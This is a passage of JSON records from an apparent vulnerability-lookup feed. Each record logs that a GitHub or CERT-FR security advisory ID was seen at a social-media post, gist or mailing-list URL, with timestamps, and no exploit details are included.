"2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4c65-9gqf-4w8h", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115702072250790374", "content": "", "creation_timestamp": "2025-12-11T17:18:35.105789Z"}, {"uuid": "bc412dec-b82a-4e35-8c90-76c630125319", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mmp7-557c-74pq", "type": "seen", "source": "https://gist.github.com/KalpanaReddyC/067e6577ca1854bba7a703be8b5c0f6e", "content": "", "creation_timestamp": "2025-12-16T11:20:02.000000Z"}, {"uuid": "5f250079-e0f3-4130-90b1-8a78db01bbd9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mmp7-557c-74pq", "type": "seen", "source": "https://gist.github.com/KalpanaReddyC/d5800fea3169dce436a720ef7fae4f84", "content": "", "creation_timestamp": "2025-12-16T11:23:51.000000Z"}, {"uuid": "45e2f80f-0461-4685-afd0-289267aa1240", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mjmj-j48q-9wg2", "type": "seen", "source": "https://gist.github.com/jerinisready/f588121fb487feb7edbfe9ee2be11a0e", "content": "", "creation_timestamp": "2025-12-16T12:21:21.000000Z"}, {"uuid": "f5dfdc0e-2185-4cf6-816e-783238398b4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cpww-gwgc-p72r", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115729519990865426", "content": "", "creation_timestamp": "2025-12-16T13:38:54.574865Z"}, {"uuid": "e4fba1b8-0b14-4dd9-8267-cf7a549720d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-632c-49p9-x7cw", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115729526690460012", "content": "", "creation_timestamp": "2025-12-16T13:40:36.629382Z"}, {"uuid": "bebb5809-e6e0-4408-8e72-62d67a82006b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-p42w-v77m-hfp8", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115729526690460012", "content": "", "creation_timestamp": "2025-12-16T13:40:36.748427Z"}, {"uuid": "942b2987-701a-4c01-9866-e93b2b94ad84", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-565g-hwwr-4pp3", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115729529089646381", "content": "", "creation_timestamp": "2025-12-16T13:41:13.252999Z"}, {"uuid": "753cdb6d-cb91-4449-a8ab-e502f1dd3671", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-r7v6-mfhq-g3m2", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115729529089646381", "content": "", "creation_timestamp": "2025-12-16T13:41:13.372731Z"}, {"uuid": "097833a1-3922-4584-a980-059c153298d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6c8h-w3j5-j293", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115729560520384729", "content": "", "creation_timestamp": "2025-12-16T13:49:12.826751Z"}, {"uuid": "1c7f3486-3290-4c05-bc36-cc74d012dd74", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mh29-5h37-fv8m", "type": "seen", "source": "https://gist.github.com/konard/c8b96f87bf3cf76a90397d4b97b03442", "content": "", "creation_timestamp": "2025-12-16T19:59:00.000000Z"}, {"uuid": "be509bb3-486d-4726-ad27-a0bc1939798d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rh64-vc2h-7wfj", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115731122138881875", "content": "", "creation_timestamp": "2025-12-16T20:26:22.259863Z"}, {"uuid": "6057202d-00bb-42a0-b7a4-a7490d697186", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-27XQ-W3JC-436C", "type": "seen", "source": "https://t.me/securixy_kz/827", "content": "", "creation_timestamp": "2026-07-12T22:00:12.691924Z"}, {"uuid": "e20a3312-3bb1-4b7c-83e6-1ce5042b51f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-73wf-3xmj-x82q", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q4/288", "content": "", "creation_timestamp": "2025-12-19T18:57:30.000000Z"}, {"uuid": "bec39d26-a275-4814-8267-1571861c91ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v98v-ff95-f3cp", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115748886231994842", "content": "", "creation_timestamp": "2025-12-19T23:44:00.019880Z"}, {"uuid": "b9119771-7108-4f28-a763-ead6a68fe0f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-62r4-hw23-cc8v", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115787390217635084", "content": "", "creation_timestamp": "2025-12-26T18:56:03.967267Z"}, {"uuid": "e58cbdf3-532e-4022-a3cd-8072b1379f2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-j4p8-h8mh-rh8q", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115787390217635084", "content": "", "creation_timestamp": "2025-12-26T18:56:04.047603Z"}, {"uuid": "3e12af8c-cd44-4a38-a790-33a68022ee47", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9pf3-7rrr-x5jh", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115788113971481272", "content": "", "creation_timestamp": "2025-12-26T22:00:07.704495Z"}, {"uuid": "926de755-152e-4961-a4fb-c8e32bc72b37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9pf3-7rrr-x5jh", "type": "seen", "source": "https://bsky.app/profile/bluesky.awakari.com/post/3mawc4er4xj2g", "content": "", "creation_timestamp": "2025-12-26T22:00:18.870350Z"}, {"uuid": "58cbca7e-5813-4f48-8269-c92cbad18aa8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9f65-56v6-gxw7", "type": "seen", "source": "https://gist.github.com/diffshare/fee6425351a21a8cc164c3eab9883f16", "content": "", "creation_timestamp": "2025-12-28T00:20:34.000000Z"}, {"uuid": "29cdbb05-1530-44a0-ad5d-7ff773ec3c84", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-056", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3maz5mpg6z52y", "content": "", "creation_timestamp": "2025-12-28T01:17:54.554088Z"}, {"uuid": "4ac05576-85a8-4486-bd53-1a7d476677ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-786v-47cq-qm6m", "type": "seen", "source": "https://gist.github.com/EbonJaeger/fbb406a1301a4e1bf0d8825c9b084ebb", "content": "", "creation_timestamp": "2026-01-02T19:59:02.000000Z"}, {"uuid": "97899a4f-f96e-4076-a3ff-1e83f49494ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hjp7-qwrj-6cc6", "type": "seen", "source": "https://gist.github.com/EbonJaeger/fbb406a1301a4e1bf0d8825c9b084ebb", "content": "", "creation_timestamp": "2026-01-02T19:59:02.000000Z"}, {"uuid": "6880cc84-8d79-4106-8ef8-bb2081643637", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h956-rh7x-ppgj", "type": "seen", "source": "https://bsky.app/profile/appsecfeed.bsky.social/post/3mblwhopnrs2r", "content": "", "creation_timestamp": "2026-01-04T12:30:24.863928Z"}, {"uuid": "072cd0d6-84a7-483d-87bb-6e694ef6e185", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v4pr-fm98-w9pg", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115854646088897217", "content": "", "creation_timestamp": "2026-01-07T16:00:07.341514Z"}, {"uuid": "75d4a78c-791c-47e6-a074-3f8433228528", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8rgw-6xp9-2fg3", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115854685327603734", "content": "", "creation_timestamp": "2026-01-07T16:10:05.913246Z"}, {"uuid": "43aa48c3-d7a1-498e-9218-f943663d0616", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v364-rw7m-3263", "type": "seen", "source": "https://cyber.gc.ca/en/alerts-advisories/n8n-security-advisory-av26-004", "content": "", "creation_timestamp": "2026-01-07T14:35:09.000000Z"}, {"uuid": "51fe1843-34c8-48c8-a163-e30ba65b1cc2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jc3f-c62g-v7qw", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115855036756832399", "content": "", "creation_timestamp": "2026-01-07T17:39:28.329353Z"}, {"uuid": "a48c5ad9-ccc5-48c9-b785-48c6fbd35b07", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pq29-69jg-9mxc", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115855349132632561", "content": "", "creation_timestamp": "2026-01-07T18:58:55.048856Z"}, {"uuid": "e2ac5793-388c-4c59-bb44-bbf5495de70a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2phv-j68v-wwqx", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115855350528854494", "content": "", "creation_timestamp": "2026-01-07T18:59:16.008163Z"}, {"uuid": "982e8548-cdb5-4d7d-897e-b227b0cfe684", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5f29-2333-h9c7", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115855499485657523", "content": "", "creation_timestamp": "2026-01-07T19:37:09.145551Z"}, {"uuid": "c6450ca0-5a84-4fa6-b6a9-fa965b4a5747", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xcmf-rpmh-hg59", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115855834341660406", "content": "", "creation_timestamp": "2026-01-07T21:02:18.464325Z"}, {"uuid": "6848f682-0d2d-4c5d-bab4-d624c958d8a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rgjq-4q58-m3q8", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115855965193079268", "content": "", "creation_timestamp": "2026-01-07T21:35:35.051611Z"}, {"uuid": "8410f942-16b7-478d-8119-aba30071aa39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-38jv-5279-wg99", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115856142351388778", "content": "", "creation_timestamp": "2026-01-07T22:20:38.284466Z"}, {"uuid": "9a08b0a6-cc7e-4c63-a037-c7688d62afb9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9rg3-9pvr-6p27", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115856306582118782", "content": "", "creation_timestamp": "2026-01-07T23:02:24.328490Z"}, {"uuid": "4e77b7bd-ed0a-45c0-99f1-57445f451f09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gv8h-7v7w-r22q", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115448189437739687", "content": "", "creation_timestamp": "2025-10-27T21:12:50.915780Z"}, {"uuid": "48270771-4519-4b75-8ea7-a0544ffaa0a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g2jx-37x6-6438", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115651535641586409", "content": "", "creation_timestamp": "2025-12-02T19:06:27.692085Z"}, {"uuid": "fa7fb948-b16b-4f11-8c5b-73fca3b5f651", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jq43-27x9-3v86", "type": "seen", "source": "https://mastodon.social/users/chrisvest/statuses/115379221747646716", "content": "", "creation_timestamp": "2025-10-15T16:53:27.810696Z"}, {"uuid": "7270eefe-aa24-4ab2-9e77-2117f5a73ef9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2rrc-f24f-94f6", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115424417623809144", "content": "", "creation_timestamp": "2025-10-23T16:27:22.765376Z"}, {"uuid": "9ce17e1a-0dc3-4195-b4a3-1c1e6b7f0102", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-047", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3m4qfxb3xoc2q", "content": "", "creation_timestamp": "2025-11-03T16:12:14.282178Z"}, {"uuid": "02f4e2bf-ab2f-43a4-bad6-b70272133210", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-047", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3m4qisik37j2u", "content": "", "creation_timestamp": "2025-11-03T17:03:15.853191Z"}, {"uuid": "2ac68c91-eaa4-44b5-bcc1-4a0c19952d36", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wcwh-7gfw-5wrr", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115255164461051194", "content": "", "creation_timestamp": "2025-09-23T19:04:03.816149Z"}, {"uuid": "ccb25f00-3af7-47ae-b999-818f1c7f7e9f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ALE-012", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/115095531158127870", "content": "", "creation_timestamp": "2025-08-26T14:27:17.226019Z"}, {"uuid": "5e8a1f62-89bf-4999-9396-4da5870c3472", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w62p-hx95-gf2c", "type": "seen", "source": "https://bsky.app/profile/hnfeed.bsky.social/post/3lyg3saq5kz2m", "content": "", "creation_timestamp": "2025-09-09T16:03:04.771652Z"}, {"uuid": "dd557ffb-1b3a-4ed7-805e-ea722654fb8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3gc7-fjrx-p6mg", "type": "seen", "source": "https://gist.github.com/rz1989s/3787e596e76e4bb395efb5509a1c1804", "content": "", "creation_timestamp": "2025-08-27T10:21:25.000000Z"}, {"uuid": "bcd07244-4793-4b5d-91d2-d4d70e065885", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fjxv-7rqg-78g4", "type": "seen", "source": "https://gist.github.com/rz1989s/3787e596e76e4bb395efb5509a1c1804", "content": "", "creation_timestamp": "2025-08-27T10:21:25.000000Z"}, {"uuid": "55881f49-0d61-4423-86f3-2c46b394dac4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v6h2-p8h4-qcjw", "type": "seen", "source": "https://gist.github.com/bsudek/980cc636266f98d8f7765e1c27dff049", "content": "", "creation_timestamp": "2025-08-27T13:18:08.000000Z"}, {"uuid": "24df2aa8-da58-4b37-9701-95913c81d22b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pf6x-cjmp-qqqq", "type": "seen", "source": "https://infosec.exchange/users/DarkWebInformer/statuses/115101896527557647", "content": "", "creation_timestamp": "2025-08-27T17:26:00.968172Z"}, {"uuid": "5176be9d-69a8-4b0f-9ba9-84189071b8c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-c2gv-xgf5-5cc2", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115102255675248188", "content": "", "creation_timestamp": "2025-08-27T18:57:20.917263Z"}, {"uuid": "b21bc9da-2675-4f23-82f5-eb2ada77ce10", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qpr4-xm66-hww6", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115610864814455085", "content": "", "creation_timestamp": "2025-11-25T14:43:20.222766Z"}, {"uuid": "315eefe4-aa79-4733-9f25-1430f4e8dfda", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-64qc-9x89-rx5j", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115107140162358517", "content": "", "creation_timestamp": "2025-08-28T15:39:32.275909Z"}, {"uuid": "c5229c9f-f9ef-451d-ab64-bea25422bf81", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m42g-xg4c-5f3h", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115107430229598200", "content": "", "creation_timestamp": "2025-08-28T16:53:19.021548Z"}, {"uuid": "8fbb4309-939f-48e2-bb73-7b55987eb176", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xjhf-7833-3pm5", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115107546152245992", "content": "", "creation_timestamp": "2025-08-28T17:22:47.321513Z"}, {"uuid": "143146ed-45e8-4754-a984-ff1527d3a79e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9m7c-m33f-3429", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115107661021724926", "content": "", "creation_timestamp": "2025-08-28T17:51:59.874902Z"}, {"uuid": "af0fadf5-b9bd-4032-b8c8-51f147468642", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5pm9-r2m8-rcmj", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115107665952068380", "content": "", "creation_timestamp": "2025-08-28T17:53:15.102623Z"}, {"uuid": "79310def-9035-47e4-a397-ef3ba747dbf3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cxm3-wv7p-598c", "type": "seen", "source": "https://bsky.app/profile/mm-hacker-news.bsky.social/post/3lxjk6hrxn427", "content": "", "creation_timestamp": "2025-08-29T07:33:15.043868Z"}, {"uuid": "5f270fa1-61d1-43c9-a15b-886c22dc6fcb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5qf6-92xg-3rr3", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115300684032923988", "content": "", "creation_timestamp": "2025-10-01T20:00:17.412788Z"}, {"uuid": "40ee4c78-c76b-497c-bbfb-917fe8b9815b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mhv7-qfmj-m3f3", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115300684032923988", "content": "", "creation_timestamp": "2025-10-01T20:00:17.588552Z"}, {"uuid": "a88179a4-3360-42dc-b7b6-e84b5cdd0b8f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vxcg-38x4-gj7j", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115300684032923988", "content": "", "creation_timestamp": "2025-10-01T20:00:17.510989Z"}, {"uuid": "444674ee-23b3-4d46-a27e-e4553764b582", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5crp-9r3c-p9vr", "type": "seen", "source": "https://gist.github.com/konard/2ff9a6fa418617d15e04215879303545", "content": "", "creation_timestamp": "2025-11-04T02:05:53.000000Z"}, {"uuid": "7372c298-357b-436a-9570-937b9b461be0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mgrm-g92q-f8h8", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q4/164", "content": "", "creation_timestamp": "2025-11-11T17:50:55.000000Z"}, {"uuid": "bef04e35-6d5f-44d2-a54c-3436c1f34c46", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vj54-72f3-p5jv", "type": "seen", "source": "https://gist.github.com/sahas-eashan/789536b1a934a546058930d310f03ada", "content": "", "creation_timestamp": "2025-12-01T01:19:24.000000Z"}, {"uuid": "7389a85f-7333-4911-bacf-7db6b0c3ca6e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmp8-hg63-v2hp", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115538907813665068", "content": "", "creation_timestamp": "2025-11-12T21:43:45.574420Z"}, {"uuid": "c767bf3d-82a8-4c2e-950f-bae00c42550e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fjf5-xgmq-5525", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115612248474210596", "content": "", "creation_timestamp": "2025-11-25T20:35:13.095709Z"}, {"uuid": "b0b4b2ae-cdbc-40af-b595-4e49d91f34a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9hp6-4448-45g2", "type": "seen", "source": "https://bsky.app/profile/azu.bsky.social/post/3lxzhvz4hvv2d", "content": "", "creation_timestamp": "2025-09-04T15:35:19.400726Z"}, {"uuid": "10ce0ff4-4ee9-478c-8322-ecd75061f951", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-869p-cjfg-cm3x", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115662798553017584", "content": "", "creation_timestamp": "2025-12-04T18:50:45.978848Z"}, {"uuid": "732aa260-14bf-4e6c-9d02-a1a88d80bc61", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9qr9-h5gf-34mp", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q4/246", "content": "", "creation_timestamp": "2025-12-04T16:58:25.000000Z"}, {"uuid": "b9c26d19-a2df-4cf0-95d2-f4d11e0ce560", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9gqj-5w7c-vx47", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115663455684770927", "content": "", "creation_timestamp": "2025-12-04T21:37:53.959325Z"}, {"uuid": "967f74c3-60c7-4b3e-9d75-8cf70ab228c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-c6xv-rcvw-v685", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115663482558015240", "content": "", "creation_timestamp": "2025-12-04T21:44:43.122195Z"}, {"uuid": "b7270917-2150-44fc-a9fc-cbc58d19ee92", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ALE-014", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/115666473271240932", "content": "", "creation_timestamp": "2025-12-05T10:25:20.048552Z"}, {"uuid": "73a9610e-4ee9-4c11-acde-bf5303c95993", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-869p-cjfg-cm3x", "type": "seen", "source": "https://gist.github.com/pxlvoid/2dee87e481533f31473871df69b485dc", "content": "", "creation_timestamp": "2025-12-07T15:01:49.000000Z"}, {"uuid": "8f78bcdd-185c-474b-81ea-6334aa761cbe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-52f5-9888-hmc6", "type": "seen", "source": "https://gist.github.com/pxlvoid/2dee87e481533f31473871df69b485dc", "content": "", "creation_timestamp": "2025-12-07T15:01:49.000000Z"}, {"uuid": "dc65c873-4ce0-455a-ac88-2c8b9d035911", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9qr9-h5gf-34mp", "type": "seen", "source": "https://gist.github.com/pxlvoid/2dee87e481533f31473871df69b485dc", "content": 